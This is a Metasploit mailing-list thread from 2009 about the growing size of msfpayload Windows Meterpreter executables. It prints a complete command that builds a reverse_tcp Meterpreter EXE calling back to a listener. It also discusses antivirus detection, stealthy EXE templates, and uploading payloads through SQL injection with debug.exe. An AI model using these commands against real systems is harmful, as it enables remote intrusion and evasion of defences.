Re: Msfpayload output size significantly bigger in v3.3 vs. v3.2

[Raul Siles <raul.siles () gmail com>]

Thanks Joshua & HD for the clarifications!

Joshua, I tried it using a smaller template and everything worked like
a charm in sqlninja. Of course, I've seen different behaviors based on
the EXE template used during my tests, such as cmd.exe windows that
remain opened (not very stealthy ;). Any recommendation for the
selection of the EXE template?


HD, I tried the new "-t exe-small" option but the following error is
generated (r7895):
--
$ msfpayload windows/meterpreter/reverse_tcp exitfunc=process
lport=443 lhost=10.10.10.16 X | msfencode -e generic/none -t exe-small
> ./small_payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: exitfunc=process,lport=443,lhost=10.10.10.16
[*] generic/none succeeded with size 87552 (iteration=1)

[-] generic/none failed: The EXE generator now has a max size of 2048
bytes, please fix the calling module
/usr/bin/samurai/msf3/lib/msf/util/exe.rb:203:in
`to_win32pe_old'/usr/bin/samurai/msf3/msfencode:229/usr/bin/samurai/msf3/msfencode:179:in
`each'/usr/bin/samurai/msf3/msfencode:179
[-] No encoders succeeded.
--

It seems it uses "template-old.exe", but if size > 2048 it generated
the error above. The old template file is 4608 bytes:

-rw-r--r-- 1 samurai samurai  4608 2009-11-06 08:26 template-old.exe

BTW, the "-t exe-small" option has not been added to the latest
msfencode help :)

I completely agree the right way to do it would be to use a two-stage
approach, like the one you described.

Cheers,
--
Raul Siles
www.raulsiles.com



On Sun, Dec 13, 2009 at 8:06 PM, HD Moore <hdm () metasploit com> wrote:
> On 12/13/2009 6:58 AM, Raul Siles wrote:
> > Hi there,
> > I've seen that the standard (reverse or bind) Meterpreter payload size
> > generated by msfpayload (for Windows .exe files) is an order of
> > magnitud bigger in MSF v3.3.1 vs. MSF v.3.2.
> >
> > MSF v3.2:    9.728 bytes
> > MSF v3.3.1: 87.552 bytes
> >
> > Without having gone in depth into the source code, is there any option
> > to reduce the size of the generated payload to a smaller one (like in
> > the range of v3.2)?
>
> There is now (r7840) by passing -t exe-small to msfencode, which will cause
> it to use the old method. The old method is flagged by most major antivirus
> products however and the new method is much more robust going forward.
>
>
> > The reason I'm asking this is due to constraints in the integration
> > between sqlninja and MSF to updload bigger payloads through the
> > Windows debug.exe technique (max 64K) using a SQLi vulnerability.
>
> We avoid this in mssql_payload by uploading a small EXE first (h2b) and then
> using that to decode the bigger exe uploaded as raw hex. You can probably
> squeeze into a binary under 64k just by picking a smaller template, as
> Joshua mentioned.
>
> -HD
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework